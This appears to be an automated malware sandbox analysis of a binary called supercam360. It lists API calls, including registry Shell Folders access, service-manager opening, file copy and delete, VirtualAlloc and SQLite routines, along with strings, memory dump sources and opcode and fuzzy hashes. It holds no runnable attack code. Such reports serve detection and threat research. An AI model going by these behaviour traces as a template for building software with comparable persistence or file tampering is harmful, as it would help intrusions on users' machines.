                                                    control_flow_graph 521 402cce-402cdd 523 40dc9b 521->523 524 40dca1 523->524 525 40d168-40d176 RegCloseKey 523->525 528 40dca3 524->528 526 40d97d-40db31 call 4031e0 525->526 526->523 528->528
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID: EShineEncoder
                                                    • API String ID: 3535843008-1597600474
                                                    • Opcode ID: 5b41531665007a81d217991c6893f759ccf1358bb147f584ce279fc5a91da054
                                                    • Instruction ID: 012348b20830d107378ed8136720504f13b5e39aecd52ebec1987391a0c9276e
                                                    • Opcode Fuzzy Hash: 5b41531665007a81d217991c6893f759ccf1358bb147f584ce279fc5a91da054
                                                    • Instruction Fuzzy Hash: 30D0EC71C48200EAC7411EF04D0957A7925BF09344735457BA003B91E5CABA490BD71E
                                                    APIs
                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040DC62
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040D5E5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                    • API String ID: 71445658-2036018995
                                                    • Opcode ID: 3bf725d415e05b0408b9a947ea3942c27790e6a72a6ab1259dd2e36986a1b2c9
                                                    • Instruction ID: 46e6dc69ee420d112a3caf2eee0461ed8c1b04e216817f0ca4a34adcfc96ca13
                                                    • Opcode Fuzzy Hash: 3bf725d415e05b0408b9a947ea3942c27790e6a72a6ab1259dd2e36986a1b2c9
                                                    • Instruction Fuzzy Hash: 5FC00250A08216DAE74466A14E5DA7672586710748F2045379D07B01D1E67C550BF51E
                                                    APIs
                                                    • CopyFileA.KERNEL32 ref: 0040D0F2
                                                    • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: CopyFileManagerOpen
                                                    • String ID:
                                                    • API String ID: 3059512871-0
                                                    • Opcode ID: 9e3146827b823fb72847a81831b6f9f609e1ae4ab21fb75e0122e33f8468bf4c
                                                    • Instruction ID: 63a47c692e634ecde8090716e013d1652f7ed24adeb4c2df2f38a42cb0036bbc
                                                    • Opcode Fuzzy Hash: 9e3146827b823fb72847a81831b6f9f609e1ae4ab21fb75e0122e33f8468bf4c
                                                    • Instruction Fuzzy Hash: 2AF090768052929AEB085B71BFB65E67FA4D702331B00027AD693B12F2D27C4A45D729
                                                    APIs
                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                      • Part of subcall function 0040430C: GetVersionExA.KERNEL32 ref: 0040432B
                                                    • HeapDestroy.KERNEL32 ref: 004044A4
                                                      • Part of subcall function 0040482B: HeapAlloc.KERNEL32(00000000,00000140,0040448D,000003F8), ref: 00404838
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                    • String ID:
                                                    • API String ID: 2507506473-0
                                                    • Opcode ID: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                    • Instruction ID: 6792b556898a49359456169ba0c82f011abfeecbff717d74d0c7f117a7ac5838
                                                    • Opcode Fuzzy Hash: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                    • Instruction Fuzzy Hash: 90F065F0A01302DAEB206B70AE4572A3695DBC0755F20483BFA04F51E0EA788884A91D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastSleep
                                                    • String ID:
                                                    • API String ID: 1458359878-0
                                                    • Opcode ID: 16b1333c6e2be3bb346ae0c34aa2f746fa4c3e66eb76d0f189a2250a68af3eb4
                                                    • Instruction ID: 111d6632d5b9c242e9fc9679db8046095268ab7c5413e818d62677c6d9c37380
                                                    • Opcode Fuzzy Hash: 16b1333c6e2be3bb346ae0c34aa2f746fa4c3e66eb76d0f189a2250a68af3eb4
                                                    • Instruction Fuzzy Hash: 9411E7719046019BEB188F64DA99B7B3BA0AF04314F14413BF907AE2C1C779CA86DB4A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastSleep
                                                    • String ID:
                                                    • API String ID: 1458359878-0
                                                    • Opcode ID: e234ee99e1e794852f87d0e5227e47b7c3f12decf1720d858daf55902e207e4c
                                                    • Instruction ID: 9e2917bad73b05df65526e13dc98655dc28116d46e1899a2a9a3aae13cf9c72c
                                                    • Opcode Fuzzy Hash: e234ee99e1e794852f87d0e5227e47b7c3f12decf1720d858daf55902e207e4c
                                                    • Instruction Fuzzy Hash: B6019B71A046119BDB188F64DE99B7A3BA0AF04314F14453BF507EE2D0C779C985DB49
                                                    APIs
                                                    • DeleteFileA.KERNEL32(5193289A,?,?,?), ref: 02DF30F3
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920155792.0000000002D9A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D9A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_2d9a000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                    • Instruction ID: cce297d23d5461e4e81f3ff1144bab41699515ea22de747c1a6ad38ad3f0174a
                                                    • Opcode Fuzzy Hash: 1436e2c2cd006d6dd6450ccdee363d2038d2b47cd0793f19acdc30a5ae073239
                                                    • Instruction Fuzzy Hash: 2B518CF250C200AFE705AF19DC8577ABBE5EFC8720F16892DE6C583644DA359851CB93
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID:
                                                    • API String ID: 481472006-0
                                                    • Opcode ID: d458c72378841d57a281c4db5a90640847ee0df62826f8d8c8b7ba3dbbe90e0b
                                                    • Instruction ID: 9af1d715428bb10e0452cb367a8199cfa5a1ac560f54e1c53b8f875cbd80c69b
                                                    • Opcode Fuzzy Hash: d458c72378841d57a281c4db5a90640847ee0df62826f8d8c8b7ba3dbbe90e0b
                                                    • Instruction Fuzzy Hash: 08F0F676D25256CDC3149BB86F112E57BF0A646B20754033BD893B20E2C7344949EB1E
                                                    APIs
                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040DC62
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID:
                                                    • API String ID: 71445658-0
                                                    • Opcode ID: b1caeba748d88131af362526e9eb5d2cedac4dbb86ea276f4220029156935f02
                                                    • Instruction ID: f8c3724f754cfcc94ef41bc6c10cfa097af13215f723e54c64c92e4290f33e94
                                                    • Opcode Fuzzy Hash: b1caeba748d88131af362526e9eb5d2cedac4dbb86ea276f4220029156935f02
                                                    • Instruction Fuzzy Hash: F4F02E31E04616CBE7108FA1D9841A9F723BB5130476046BFD851A3284E339944EDB48
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 58385ccaa7b7034decbcb582908fb41edbfb6e48ea1f767cd773899efa36b1c6
                                                    • Instruction ID: 24ab9ea8706f183bf36089ca0671f6bd679c7bc8bd1ec4c941c05a3988f0b299
                                                    • Opcode Fuzzy Hash: 58385ccaa7b7034decbcb582908fb41edbfb6e48ea1f767cd773899efa36b1c6
                                                    • Instruction Fuzzy Hash: F3F0A938A04203CFDB00CE99D9C0BA633E0BB58780B50406ADC02EB388D378D5028E99
                                                    APIs
                                                    • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: ManagerOpen
                                                    • String ID:
                                                    • API String ID: 1889721586-0
                                                    • Opcode ID: 1f3cd9f2903824330797f64285bbd9b8ac78e1855b66ca3c743892f81974d4d0
                                                    • Instruction ID: bcc538560c25e25718ea8e5d329da63500f38517310f8df8015202c046b36953
                                                    • Opcode Fuzzy Hash: 1f3cd9f2903824330797f64285bbd9b8ac78e1855b66ca3c743892f81974d4d0
                                                    • Instruction Fuzzy Hash: 33E0DF308061528AD3084FA06BA00603B60E909721310047FC083B54F2D63C4A46EB2A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 6986c9eefc83e51a25370ac1a3e60436c139926f161bcfc0030a1d8b7de223a1
                                                    • Instruction ID: f31876c6c4c0f138cccee9462a0086245c419a974d7cab85ff81069ee65e3e82
                                                    • Opcode Fuzzy Hash: 6986c9eefc83e51a25370ac1a3e60436c139926f161bcfc0030a1d8b7de223a1
                                                    • Instruction Fuzzy Hash: E5D0A77080460893DF240B305A5CCE677F0A715301B615472D181741E1C7B94645A76D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    • Opcode ID: 0a848a0bc4f9794f60dd0c3c1d8d599b53582c9a33dd7429fb53a4b9a79c8d04
                                                    • Instruction ID: e53e838d189e15d1a88c58be6bb062d1bba2abba8716db84d0347d729f9f21c2
                                                    • Opcode Fuzzy Hash: 0a848a0bc4f9794f60dd0c3c1d8d599b53582c9a33dd7429fb53a4b9a79c8d04
                                                    • Instruction Fuzzy Hash: 7FB09230908108CBC2188A508B4C6F6777C5704780B2651FB950BB10E0DB7C9A4EB91F
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory
                                                    • String ID:
                                                    • API String ID: 4241100979-0
                                                    • Opcode ID: 4e171e566df61bc11b155f3428819f5ad54eaba0083f16c23a33ef502eef1c3c
                                                    • Instruction ID: 622b69b224c93727709cec0e4232e9ca8028897ae25a3fec4193af00d866e9b4
                                                    • Opcode Fuzzy Hash: 4e171e566df61bc11b155f3428819f5ad54eaba0083f16c23a33ef502eef1c3c
                                                    • Instruction Fuzzy Hash: 86B0122094D012F6D00122C00D04D6B293C1915398B3141337107700C105BC000FB67F
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000), ref: 0040D404
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: d2199ccd38951a2228f4690c2bb14869746e9adfcd46edbeab367d5f72275205
                                                    • Instruction ID: 1128adf815e116da34b669ea7842f0fee9a422ad02bf30eda05eda9f0811fc53
                                                    • Opcode Fuzzy Hash: d2199ccd38951a2228f4690c2bb14869746e9adfcd46edbeab367d5f72275205
                                                    • Instruction Fuzzy Hash: 7BC08C31C08212EFEA404B908A487187AA4AB08709F150061EA85B2280C2B80828EBE9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 4b1c864105606ac8e99e9f5613e34887e3b99aeb5aa06c5b01fb020e8278d748
                                                    • Instruction ID: f0c6549872d860ea028944903253f61ce079030b04137f1852cf427867728f85
                                                    • Opcode Fuzzy Hash: 4b1c864105606ac8e99e9f5613e34887e3b99aeb5aa06c5b01fb020e8278d748
                                                    • Instruction Fuzzy Hash: D3B01231948700D6D6402BA0BF0DF1036307704700F20413BA34A344E086FD1409BB0F
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2919023780.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.2919023780.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpi
                                                    • String ID:
                                                    • API String ID: 1586166983-0
                                                    • Opcode ID: 2866c08ac9b87989cc392699c312b0709f7a9addcb088bca7ad9bd041635be8a
                                                    • Instruction ID: 152760751094682eaf5c06a675cbf44d7ff1935ba39f90d314b64f28574f5972
                                                    • Opcode Fuzzy Hash: 2866c08ac9b87989cc392699c312b0709f7a9addcb088bca7ad9bd041635be8a
                                                    • Instruction Fuzzy Hash: 87900221604101DEE2001B735E0821525946604651312887D5453E1150DA3880095529
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                      • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                    • sqlite3_step.SQLITE3 ref: 6096755A
                                                    • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                    • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                    • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                    • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                    • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                    • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                    • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                    • sqlite3_step.SQLITE3 ref: 609679C3
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                    • sqlite3_step.SQLITE3 ref: 60967AB4
                                                    • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                    • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                    • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                    • sqlite3_step.SQLITE3 ref: 60967B94
                                                    • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                    • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                    • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                    • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                    • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                    • sqlite3_step.SQLITE3 ref: 60967C7D
                                                    • memcmp.MSVCRT ref: 60967D4C
                                                    • sqlite3_free.SQLITE3 ref: 60967D69
                                                    • sqlite3_free.SQLITE3 ref: 60967D74
                                                    • sqlite3_free.SQLITE3 ref: 60967FF7
                                                    • sqlite3_free.SQLITE3 ref: 60968002
                                                      • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                      • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                      • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                      • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                      • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                    • sqlite3_reset.SQLITE3 ref: 60967C93
                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                    • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                    • sqlite3_reset.SQLITE3 ref: 60968035
                                                    • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                    • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                    • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                    • sqlite3_step.SQLITE3 ref: 609680D1
                                                    • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                    • sqlite3_reset.SQLITE3 ref: 60968104
                                                    • sqlite3_step.SQLITE3 ref: 60968139
                                                    • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                    • sqlite3_reset.SQLITE3 ref: 6096818A
                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                      • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                    • sqlite3_reset.SQLITE3 ref: 609679E9
                                                      • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                    • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                      • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                    • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                      • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                    • sqlite3_reset.SQLITE3 ref: 609675B7
                                                    • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                    • sqlite3_step.SQLITE3 ref: 6096764C
                                                    • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                    • sqlite3_reset.SQLITE3 ref: 6096768B
                                                    • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                      • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                    • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                    • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                    • sqlite3_step.SQLITE3 ref: 609690E6
                                                    • sqlite3_reset.SQLITE3 ref: 609690F1
                                                    • sqlite3_free.SQLITE3 ref: 60969102
                                                    • sqlite3_free.SQLITE3 ref: 6096910D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                    • String ID: $d
                                                    • API String ID: 2451604321-2084297493
                                                    • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                    • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                    • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                    • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                    • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                    • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                    • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                    • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                    • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                    • sqlite3_step.SQLITE3 ref: 6096A969
                                                    • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                    • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                    • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                      • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                      • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                      • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                    • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                    • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                    • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                    • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                    • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                    • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                    • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                    • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                    • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                    • String ID: optimize
                                                    • API String ID: 1540667495-3797040228
                                                    • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                    • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                    • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                    • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 6096286E
                                                    • sqlite3_vtab_config.SQLITE3 ref: 60962898
                                                    • sqlite3_malloc.SQLITE3 ref: 609628D7
                                                    • sqlite3_mprintf.SQLITE3 ref: 60962978
                                                    • sqlite3_mprintf.SQLITE3 ref: 609629C0
                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                      • Part of subcall function 60961580: sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                      • Part of subcall function 60961580: sqlite3_step.SQLITE3 ref: 609615C9
                                                      • Part of subcall function 60961580: sqlite3_column_int.SQLITE3 ref: 609615E1
                                                      • Part of subcall function 60961580: sqlite3_finalize.SQLITE3 ref: 609615EE
                                                    • sqlite3_mprintf.SQLITE3 ref: 609629F0
                                                    • sqlite3_mprintf.SQLITE3 ref: 60962BEE
                                                    • sqlite3_prepare_v2.SQLITE3 ref: 60962C23
                                                    • sqlite3_free.SQLITE3 ref: 60962C30
                                                    • sqlite3_errmsg.SQLITE3 ref: 60962C49
                                                    • sqlite3_mprintf.SQLITE3 ref: 60962C59
                                                    • sqlite3_mprintf.SQLITE3 ref: 60962C79
                                                    • sqlite3_mprintf.SQLITE3 ref: 60962C9C
                                                    • sqlite3_free.SQLITE3 ref: 60962CA7
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
